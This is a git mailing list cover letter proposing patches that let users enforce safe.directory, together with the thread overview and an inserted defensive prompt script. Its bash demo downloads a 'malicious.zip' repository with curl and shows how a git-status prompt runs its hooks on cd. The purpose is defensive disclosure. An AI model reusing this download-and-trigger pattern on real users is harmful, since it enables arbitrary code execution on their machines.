From: Michael Lohmann <git@lohmann.sh>
To: git@vger.kernel.org
Cc: Michael Lohmann <git@lohmann.sh>, Jeff King <peff@peff.net>
Subject: [PATCH 0/5] Allow enforcing safe.directory
Date: Mon, 13 Oct 2025 11:41:41 +0200	[thread overview]
Message-ID: <20251013094152.23597-1-git@lohmann.sh> (raw)

Hey everyone!

As a first step to allow making git more resistant against accidental
arbitrary code execution, Jeff King suggested in

 https://lore.kernel.org/git/20251009224317.77565-1-git@lohmann.sh/T/#m6cce96f9ae58a4341ae3fbbc02110e20547c58bc

to make the "safe.directory" config enforceable.
If a user has a command line status like:

```bash
# Let's assume the simplest command status prompt that shows "(+)" if
# there are uncommitted changes (note: "then" must not be followed by ";"):
export PS1='$(if [ -n "$(git status --short 2>/dev/null)" ]; then echo "(+)"; fi)> '

# You download a random zip folder from the internet, not knowing it is
# actually a repo:
curl --silent https://www.lohmann.sh/nuggits/002-dangerous-git/malicious.zip --output malicious.zip
# unzipping means the folder is owned by the user, so by default git
# assumes it is safe to execute hooks/config
unzip malicious.zip >/dev/null

echo 'Just a "README" no "xxx" file, see:'
ls malicious

# This `cd` now triggers arbitrary code execution due to `git status`:
cd malicious
# now there is an "xxx" file
```

With this feature, the prompt could either perform
`git --assume-unsafe status` or, to make all git invocations by any
programs safe against accidental arbitrary code invocations, a user could
set "safe.assumeUnsafe" to true.

Also allow temporarily bypassing this check with a new `--allow-unsafe`
flag.

--Michael

Michael Lohmann (5):
  setup: rename `ensure_safe_repository()` for clarity
  setup: rename `die_upon_assumed_unsafe_repo()` to align with check
  setup: refactor `ensure_safe_repository()` testing priorities
  setup: allow temporary bypass of `ensure_safe_repository()` checks
  setup: allow not marking self owned repos as safe in
    `ensure_safe_repository()`

 Documentation/config/safe.adoc    |  9 ++++
 Documentation/git.adoc            | 25 +++++++++++
 builtin/clone.c                   |  2 +-
 environment.h                     |  2 +
 git.c                             |  9 ++++
 path.c                            |  4 +-
 setup.c                           | 45 ++++++++++++++------
 setup.h                           |  2 +-
 t/meson.build                     |  1 +
 t/t0036-allow-unsafe-directory.sh | 70 +++++++++++++++++++++++++++++++
 10 files changed, 153 insertions(+), 16 deletions(-)
 create mode 100755 t/t0036-allow-unsafe-directory.sh

-- 
2.50.1 (Apple Git-155)
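A defensive counterpart to the prompt in the cover letter, added here as an example and not code from the series: a prompt helper that locates the repository root without invoking git at all, and only runs `git status` when that root is on an explicit allowlist (`TRUSTED_REPO_ROOTS`, a constructed name and default value). Until something like `safe.assumeUnsafe` exists, this approximates its effect from the shell side.

```shell
#!/bin/sh
# Added example (not part of the patch series). Untrusted checkouts never
# cause any git command to run, so nothing inside their .git/ is consulted.
# Allowlist: colon-separated absolute repo roots (constructed default).
TRUSTED_REPO_ROOTS="${TRUSTED_REPO_ROOTS:-$HOME/src/project-a:$HOME/src/project-b}"

# Print the nearest directory at or above $1 that contains a .git entry.
# Uses only cd/pwd/dirname, never git. Fails if $1 is not inside a repo.
find_repo_root() {
    dir=$(cd "$1" 2>/dev/null && pwd -P) || return 1
    while :; do
        if [ -e "$dir/.git" ]; then
            printf '%s\n' "$dir"
            return 0
        fi
        [ "$dir" = "/" ] && return 1
        dir=$(dirname "$dir")
    done
}

# Succeed only if $1 exactly matches one allowlist entry (no prefix match,
# so a trusted parent does not implicitly trust repos nested below it).
is_trusted_root() {
    old_ifs=$IFS; IFS=:
    for entry in $TRUSTED_REPO_ROOTS; do
        if [ "$entry" = "$1" ]; then IFS=$old_ifs; return 0; fi
    done
    IFS=$old_ifs
    return 1
}

# Prompt fragment: "(+)" for a dirty trusted repo, "(?)" for an untrusted
# repo, nothing outside a repository. Only trusted roots ever invoke git.
git_prompt_marker() {
    root=$(find_repo_root "${1:-$PWD}") || return 0
    if ! is_trusted_root "$root"; then
        printf '(?)'
        return 0
    fi
    [ -n "$(git -C "$root" status --short 2>/dev/null)" ] && printf '(+)'
    return 0
}

# Usage in an interactive shell: PS1='$(git_prompt_marker)> '
```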


Thread overview: 24+ messages
2025-10-13  9:41 Michael Lohmann [this message]
2025-10-13  9:41 ` [PATCH 1/5] setup: rename `ensure_safe_repository()` for clarity Michael Lohmann
2025-10-13  9:41 ` [PATCH 2/5] setup: rename `die_upon_assumed_unsafe_repo()` to align with check Michael Lohmann
2025-10-14 20:16   ` Junio C Hamano
2025-10-13  9:41 ` [PATCH 3/5] setup: refactor `ensure_safe_repository()` testing priorities Michael Lohmann
2025-10-14 20:32   ` Junio C Hamano
2025-10-13  9:41 ` [PATCH 4/5] setup: allow temporary bypass of `ensure_safe_repository()` checks Michael Lohmann
2025-10-13  9:41 ` [PATCH 5/5] setup: allow not marking self owned repos as safe in `ensure_safe_repository()` Michael Lohmann
2025-10-13 11:59   ` D. Ben Knoble
2025-10-13 21:46     ` [PATCH v2 0/5] Apply comments of D. Ben Knoble Michael Lohmann
2025-10-13 21:46       ` [PATCH v2 1/5] setup: rename `ensure_safe_repository()` for clarity Michael Lohmann
2025-10-13 21:46       ` [PATCH v2 2/5] setup: rename `die_upon_assumed_unsafe_repo()` to align with check Michael Lohmann
2025-10-13 21:46       ` [PATCH v2 3/5] setup: refactor `ensure_safe_repository()` testing priorities Michael Lohmann
2025-10-13 21:46       ` [PATCH v2 4/5] setup: allow temporary bypass of `ensure_safe_repository()` checks Michael Lohmann
2025-10-13 21:46       ` [PATCH v2 5/5] setup: allow not marking self owned repos as safe in `ensure_safe_repository()` Michael Lohmann
2025-10-16  5:33 ` [PATCH v3 0/5] Allow skipping ownership of repo in safety consideration Michael Lohmann
2025-10-16  5:33   ` [PATCH v3 1/5] setup: rename `ensure_safe_repository()` for clarity Michael Lohmann
2025-10-16  5:33   ` [PATCH v3 2/5] setup: rename `die_upon_unsafe_repo()` to align with check Michael Lohmann
2025-10-16  5:33   ` [PATCH v3 3/5] setup: refactor `ensure_safe_repository()` testing priorities Michael Lohmann
2025-10-16  5:33   ` [PATCH v3 4/5] setup: allow temporary bypass of `ensure_safe_repository()` checks Michael Lohmann
2025-10-16 19:26     ` Junio C Hamano
2025-10-16  5:33   ` [PATCH v3 5/5] setup: allow not marking self owned repos as safe in `ensure_safe_repository()` Michael Lohmann
2025-10-16 19:33     ` Junio C Hamano
2025-10-16 19:58     ` Junio C Hamano